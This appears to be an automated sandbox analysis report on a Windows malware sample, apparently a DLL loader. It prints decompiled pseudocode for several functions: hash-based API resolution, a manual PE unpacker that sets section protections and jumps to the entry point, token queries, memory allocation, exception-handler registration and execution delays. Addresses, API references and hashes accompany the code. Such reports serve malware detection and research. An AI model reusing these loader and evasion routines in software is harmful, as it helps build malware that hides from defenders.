						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E8F35F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E8F0FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E8F306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E8F0FD4(_t403, _t413, _t403);
								}
								E6E8EF654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E8EBB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E8EBB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e8f073f
0x6e8f0741
0x6e8f0748
0x6e8f0fc7
0x6e8f0fcd
0x6e8f0fcd
0x6e8f0752
0x6e8f075e
0x6e8f076a
0x6e8f076f
0x6e8f077c
0x6e8f078d
0x6e8f078f
0x6e8f0790
0x6e8f0791
0x6e8f0791
0x6e8f0792
0x6e8f0796
0x6e8f079a
0x6e8f079f
0x6e8f07a2
0x6e8f07a8
0x6e8f07c2
0x6e8f07c9
0x6e8f07cc
0x6e8f07cf
0x6e8f07d1
0x6e8f07dd
0x6e8f07ea
0x6e8f07f7
0x6e8f07fb
0x6e8f0887
0x6e8f0887
0x6e8f0889
0x6e8f088d
0x6e8f0898
0x6e8f08ae
0x6e8f08b1
0x6e8f08b1
0x6e8f08b5
0x6e8f08be
0x6e8f08c3
0x6e8f08c3
0x6e8f08c5
0x6e8f08d6
0x6e8f08f8
0x6e8f08fa
0x6e8f08fb
0x6e8f08ff
0x6e8f08ff
0x6e8f0908
0x6e8f0914
0x6e8f091d
0x6e8f0933
0x6e8f0943
0x6e8f0948
0x6e8f094c
0x6e8f0951
0x6e8f0953
0x6e8f09a3
0x6e8f09b8
0x6e8f09bc
0x6e8f09c1
0x6e8f09d2
0x6e8f09e7
0x6e8f09eb
0x6e8f09f0
0x6e8f09f2
0x6e8f0a39
0x6e8f0a3c
0x6e8f0a8a
0x6e8f0a8d
0x6e8f0ace
0x6e8f0ad2
0x6e8f0ad7
0x6e8f0adc
0x6e8f0afb
0x6e8f0afb
0x6e8f0afb
0x6e8f0afd
0x00000000
0x6e8f0afd
0x6e8f0ade
0x6e8f0ae2
0x6e8f0ae4
0x6e8f0aeb
0x6e8f0aeb
0x6e8f0af1
0x6e8f0af1
0x6e8f0af3
0x6e8f0af6
0x6e8f0af6
0x00000000
0x6e8f0af3
0x6e8f0ae6
0x6e8f0ae9
0x6e8f0aef
0x6e8f0aef
0x00000000
0x6e8f0aef
0x00000000
0x6e8f0ae9
0x6e8f0a8f
0x6e8f0a92
0x00000000
0x00000000
0x6e8f0a98
0x6e8f0a9d
0x6e8f0aa2
0x6e8f0ac1
0x6e8f0ac1
0x6e8f0acb
0x00000000
0x6e8f0acb
0x6e8f0aa4
0x6e8f0aa8
0x6e8f0aaa
0x6e8f0ab1
0x6e8f0ab1
0x6e8f0ab7
0x6e8f0ab7
0x6e8f0ab9
0x6e8f0abc
0x6e8f0abc
0x00000000
0x6e8f0ab9
0x6e8f0aac
0x6e8f0aaf
0x6e8f0ab5
0x6e8f0ab5
0x00000000
0x6e8f0ab5
0x00000000
0x6e8f0aaf
0x6e8f0a3e
0x6e8f0a40
0x6e8f0a7f
0x6e8f0a82
0x6e8f0df4
0x6e8f0df9
0x6e8f0dfe
0x6e8f0e1d
0x6e8f0e1d
0x6e8f0e27
0x00000000
0x6e8f0e27
0x6e8f0e00
0x6e8f0e04
0x6e8f0e06
0x6e8f0e0d
0x6e8f0e0d
0x6e8f0e13
0x6e8f0e13
0x6e8f0e15
0x6e8f0e18
0x6e8f0e18
0x00000000
0x6e8f0e15
0x6e8f0e08
0x6e8f0e0b
0x6e8f0e11
0x6e8f0e11
0x00000000
0x6e8f0e11
0x00000000
0x6e8f0e0b
0x00000000
0x6e8f0a88
0x6e8f0a46
0x6e8f0a4b
0x6e8f0a50
0x6e8f0a6f
0x6e8f0a6f
0x6e8f0a79
0x00000000
0x6e8f0a79
0x6e8f0a52
0x6e8f0a56
0x6e8f0a58
0x6e8f0a5f
0x6e8f0a5f
0x6e8f0a65
0x6e8f0a65
0x6e8f0a67
0x6e8f0a6a
0x6e8f0a6a
0x00000000
0x6e8f0a67
0x6e8f0a5a
0x6e8f0a5d
0x6e8f0a63
0x6e8f0a63
0x00000000
0x6e8f0a63
0x00000000
0x6e8f0a5d
0x6e8f09f4
0x6e8f09f6
0x00000000
0x00000000
0x6e8f0a00
0x6e8f0a05
0x6e8f0a0a
0x6e8f0a29
0x6e8f0a29
0x6e8f0a33
0x00000000
0x6e8f0a33
0x6e8f0a0c
0x6e8f0a10
0x6e8f0a12
0x6e8f0a19
0x6e8f0a19
0x6e8f0a1f
0x6e8f0a1f
0x6e8f0a21
0x6e8f0a24
0x6e8f0a24
0x00000000
0x6e8f0a21
0x6e8f0a14
0x6e8f0a17
0x6e8f0a1d
0x6e8f0a1d
0x00000000
0x6e8f0a1d
0x00000000
0x6e8f0a17
0x6e8f0959
0x6e8f095e
0x6e8f0963
0x6e8f0982
0x6e8f0982
0x6e8f098c
0x00000000
0x6e8f098c
0x6e8f0965
0x6e8f0969
0x6e8f096b
0x6e8f0972
0x6e8f0972
0x6e8f0978
0x6e8f0978
0x6e8f097a
0x6e8f097d
0x6e8f097d
0x00000000
0x6e8f097a
0x6e8f096d
0x6e8f0970
0x6e8f0976
0x6e8f0976
0x00000000
0x6e8f0976
0x00000000
0x6e8f089a
0x6e8f089c
0x6e8f0b01
0x6e8f0b06
0x6e8f0b09
0x6e8f0b0e
0x6e8f0b10
0x6e8f0b25
0x6e8f0b28
0x6e8f0bf6
0x6e8f0bfe
0x6e8f0c01
0x6e8f0c16
0x6e8f0c20
0x6e8f0c20
0x6e8f0c22
0x6e8f0c24
0x6e8f0c33
0x6e8f0c3f
0x6e8f0c43
0x6e8f0c46
0x6e8f0c49
0x6e8f0c4c
0x00000000
0x6e8f0c4c
0x6e8f0b38
0x6e8f0b4a
0x6e8f0b4e
0x6e8f0bda
0x6e8f0bda
0x6e8f0be0
0x6e8f0beb
0x6e8f0be2
0x6e8f0be2
0x6e8f0be2
0x00000000
0x6e8f0be0
0x6e8f0b5b
0x6e8f0b5c
0x6e8f0b5e
0x6e8f0b64
0x6e8f0fb3
0x6e8f0fb8
0x6e8f0fba
0x00000000
0x00000000
0x6e8f0fc0
0x6e8f0b7b
0x6e8f0b7f
0x6e8f0b84
0x6e8f0b96
0x6e8f0b9a
0x6e8f0ba5
0x6e8f0ba6
0x6e8f0ba7
0x6e8f0ba8
0x6e8f0baa
0x6e8f0bb5
0x6e8f0e2d
0x6e8f0e2d
0x6e8f0bb5
0x6e8f0bbb
0x6e8f0bc4
0x6e8f0e3f
0x6e8f0e55
0x6e8f0e57
0x6e8f0e59
0x6e8f0f94
0x6e8f0f9b
0x00000000
0x6e8f0f9b
0x6e8f0e68
0x6e8f0e76
0x6e8f0e90
0x6e8f0e92
0x6e8f0e94
0x6e8f0fa5
0x6e8f0faa
0x6e8f0fac
0x00000000
0x00000000
0x6e8f0fae
0x6e8f0ea8
0x6e8f0eb3
0x6e8f0ec2
0x6e8f0ed4
0x6e8f0ed6
0x6e8f0ed8
0x6e8f0ee5
0x6e8f0ee5
0x6e8f0ef5
0x6e8f0f06
0x6e8f0f0b
0x6e8f0f0d
0x6e8f0f0f
0x6e8f0f16
0x6e8f0f17
0x6e8f0f17
0x6e8f0f23
0x6e8f0f44
0x6e8f0f4d
0x6e8f0f59
0x6e8f0f65
0x6e8f0f6a
0x6e8f0f6f
0x6e8f0f75
0x6e8f0f75
0x6e8f0f7a
0x6e8f0f80
0x00000000
0x6e8f0f86
0x6e8f0f88
0x00000000
0x6e8f0f88
0x6e8f0bca
0x6e8f0bca
0x6e8f0bcf
0x6e8f0bd5
0x6e8f0bd5
0x00000000
0x6e8f0bcf
0x6e8f0bc4
0x6e8f0898
0x6e8f0808
0x6e8f0809
0x6e8f080b
0x6e8f0811
0x6e8f0dde
0x6e8f0de3
0x6e8f0de5
0x00000000
0x00000000
0x6e8f0deb
0x6e8f0828
0x6e8f082c
0x6e8f0831
0x6e8f0847
0x6e8f085e
0x6e8f0862
0x6e8f0c5a
0x6e8f0c5a
0x6e8f0862
0x6e8f0868
0x6e8f0871
0x6e8f0c69
0x6e8f0c7a
0x6e8f0c7f
0x6e8f0c81
0x6e8f0c83
0x6e8f0db4
0x6e8f0db8
0x00000000
0x6e8f0db8
0x6e8f0c8f
0x6e8f0cb4
0x6e8f0cb6
0x6e8f0cb8
0x6e8f0dd0
0x6e8f0dd5
0x6e8f0dd7
0x00000000
0x00000000
0x6e8f0dd9
0x6e8f0cc9
0x6e8f0cd7
0x6e8f0cde
0x6e8f0cdf
0x6e8f0ce0
0x6e8f0cf2
0x6e8f0cf4
0x6e8f0cf6
0x00000000
0x00000000
0x6e8f0cfe
0x6e8f0d19
0x6e8f0d1b
0x6e8f0d1d
0x6e8f0dc2
0x6e8f0dc7
0x6e8f0dc9
0x00000000
0x00000000
0x6e8f0dcb
0x6e8f0d23
0x6e8f0d2a
0x6e8f0d2e
0x6e8f0d99
0x6e8f0d99
0x6e8f0d9b
0x6e8f0da2
0x6e8f0da2
0x6e8f0da8
0x6e8f0da8
0x6e8f0daa
0x6e8f0daf
0x6e8f0daf
0x00000000
0x6e8f0daa
0x6e8f0d9d
0x6e8f0da0
0x6e8f0da6
0x6e8f0da6
0x00000000
0x6e8f0da6
0x00000000
0x6e8f0da0
0x6e8f0d30
0x6e8f0d30
0x6e8f0d32
0x6e8f0d3e
0x6e8f0d43
0x6e8f0d45
0x00000000
0x00000000
0x6e8f0d47
0x6e8f0d4b
0x6e8f0d52
0x6e8f0d53
0x6e8f0d54
0x6e8f0d56
0x00000000
0x00000000
0x6e8f0d58
0x6e8f0d5a
0x6e8f0d61
0x6e8f0d61
0x6e8f0d67
0x6e8f0d67
0x6e8f0d69
0x6e8f0d6e
0x6e8f0d6e
0x6e8f0d77
0x6e8f0d7c
0x6e8f0d81
0x6e8f0d87
0x6e8f0d87
0x6e8f0d8c
0x00000000
0x6e8f0d8c
0x6e8f0d5c
0x6e8f0d5f
0x6e8f0d65
0x6e8f0d65
0x00000000
0x6e8f0d65
0x00000000
0x6e8f0d93
0x6e8f0d93
0x6e8f0d94
0x6e8f0d94
0x00000000
0x6e8f0d32
0x6e8f0877
0x6e8f087c
0x6e8f0882
0x6e8f0882
0x00000000
0x6e8f0c59
0x6e8f0c59
0x6e8f0c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E8F085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E8F0C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E8F0CB4

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 546239420cc84c1560a7eb102c8395b0fb1827f5e23bb012e2d3fc0d5cfe86ab
Instruction ID: 81c5fadcca9d3cd4ca2ab5e487b58822d4846999c29346e627e4308033fbd02a
Opcode Fuzzy Hash: 546239420cc84c1560a7eb102c8395b0fb1827f5e23bb012e2d3fc0d5cfe86ab
Instruction Fuzzy Hash: FD22C270648341EFE761DBA8C850BDB77A9AF82388F108D19E8949B1D5FB30D906CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E8F2234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E8F3AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E8F306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e8f2234
0x6e8f2238
0x6e8f2254
0x6e8f2257
0x6e8f223a
0x6e8f2249
0x6e8f224c
0x6e8f224c
0x6e8f2267
0x6e8f226c
0x6e8f2270
0x6e8f2278
0x6e8f2278
0x6e8f227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E8E4B17,00000000,00000000,?), ref: 6E8F2278

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 05abfe1967f811690eccc53735852684941b23493cd4db9066d2d9fab27671e2
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 53E065B010E302EEE744966D9C15B6F76D8AF84650F208D2DB468D71C4F67498028361

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8F2820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E8F306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e8f2827
0x6e8f2830
0x6e8f283e
0x6e8f2861
0x6e8f2861
0x6e8f2840
0x6e8f2857
0x6e8f285b
0x00000000
0x6e8f285d
0x6e8f285d
0x6e8f285d
0x6e8f285b
0x6e8f2866

APIs

NtAllocateVirtualMemory.NTDLL(6E8F88E6,?,00000000,000000FF,6E8F88E6,6E8F88E6,60A28C5C,60A28C5C,?,?,6E8F88E6,00003000,00000004,000000FF), ref: 6E8F2857

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: 5c44060582d5725112467b2edd1024f2c993727742be41fee984bf64b2fa0cf8
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 08E03071209342EFEB08CA99CC14D6BBBE9EF84644F108C2DB4A4D7250E734DC019721

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E8F3138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E8F34B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e8f3138
0x6e8f313d
0x6e8f313f
0x6e8f3141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E8F34B0,6E8F3128,60A28C5C,60A28C5C,?,6E8E6C99,00000000), ref: 6E8F313F

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 6fc660ed2738920760d77ef307bc8b277d64767b06ee568bbc1f221a84c393b9
Instruction ID: 84aed778f52690469b1b0302bbad3c6a6cdc52d3e6e086000f32e36b3b70bea6
Opcode Fuzzy Hash: 6fc660ed2738920760d77ef307bc8b277d64767b06ee568bbc1f221a84c393b9
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 009E2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E009E2092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0x9e4418 = 1;
				asm("movaps xmm0, [0x9e3010]");
				asm("movups [0x9e4428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E009E1770();
				E009E17BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E009E1770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0x9e4418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E009E1770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x009e209e
0x009e20ac
0x009e20b3
0x009e20b6
0x009e20c0
0x009e20c7
0x009e20d1
0x009e20d7
0x009e20e0
0x009e20e9
0x009e20ec
0x009e20f0
0x009e20f8
0x009e20ff
0x009e2102
0x009e2105
0x009e2108
0x009e210b
0x009e2125
0x009e212b
0x009e212e
0x009e2136
0x009e213a
0x009e213d
0x009e2140
0x009e2143
0x009e2146
0x009e2162
0x009e217f
0x009e21a4
0x009e21a6
0x009e21af
0x009e21b2
0x009e21bc
0x009e21bf
0x009e21c2
0x009e21c5
0x009e21c8
0x009e2216
0x009e2216
0x009e2249
0x009e224c
0x009e225c
0x009e225f
0x009e22a8
0x009e22a8
0x009e22b7
0x009e22bf
0x009e22cd
0x009e22dc
0x009e230d
0x009e2316
0x009e231a
0x009e231e
0x009e2325
0x009e232b
0x009e232d
0x009e2336
0x009e2347
0x009e234d
0x009e2350
0x009e2353
0x00000000
0x00000000
0x009e2359
0x009e22a8
0x009e2264
0x009e2272
0x009e227a
0x009e227d
0x009e227f
0x009e2285
0x009e2291
0x009e2297
0x009e229a
0x009e229d
0x009e21f9
0x009e21f9
0x009e236e
0x009e2374
0x009e2379
0x009e237f
0x009e2385
0x009e238b
0x009e2391
0x009e2394
0x009e2397
0x009e239f
0x009e23a7
0x009e23ad
0x009e23b3
0x009e23b9
0x009e23bf
0x009e23cd
0x009e21da
0x009e21e0
0x009e21e0
0x009e2234

APIs

VirtualProtect.KERNELBASE ref: 009E210B
VirtualProtect.KERNELBASE ref: 009E21A4
VirtualProtect.KERNELBASE ref: 009E232B

Strings

`, xrefs: 009E239F

Memory Dump Source

Source File: 00000000.00000002.648952554.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: 038a2f4272da48df42467ac096c3946240d7a557d951e1b7372d29bcfde1467d
Instruction ID: d65228178d4e969f6f03aa7ef323baa24b269771aa16ade756e8e6030ccdcdcb
Opcode Fuzzy Hash: 038a2f4272da48df42467ac096c3946240d7a557d951e1b7372d29bcfde1467d
Instruction Fuzzy Hash: B8B1BEB5E04218CFCB14CFA9C880A9DBBF1BF88304F15856AE958AB351D735AD85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E8F10A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6E8F306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6E8EC280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6E8EBB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6E8F306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6E8EF584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6E8EF4BC(_t59, 0);
					_t34 = E6E8F306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6e8f10b3
0x6e8f10b5
0x6e8f10c4
0x6e8f10c8
0x6e8f10d2
0x6e8f10d2
0x6e8f10d8
0x6e8f10db
0x6e8f10dd
0x6e8f10e8
0x6e8f1122
0x6e8f1127
0x6e8f112c
0x6e8f112c
0x00000000
0x6e8f1131
0x6e8f10f4
0x6e8f1107
0x6e8f1118
0x6e8f1118
0x6e8f111a
0x6e8f1120
0x6e8f113e
0x6e8f1145
0x6e8f114e
0x6e8f115c
0x6e8f1165
0x6e8f1168
0x6e8f116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E8F1118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E8F117B

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: 4284b30cc84ab2359a4589fdd3173846a9d04e2e637f8d8a81942d896de3b917
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
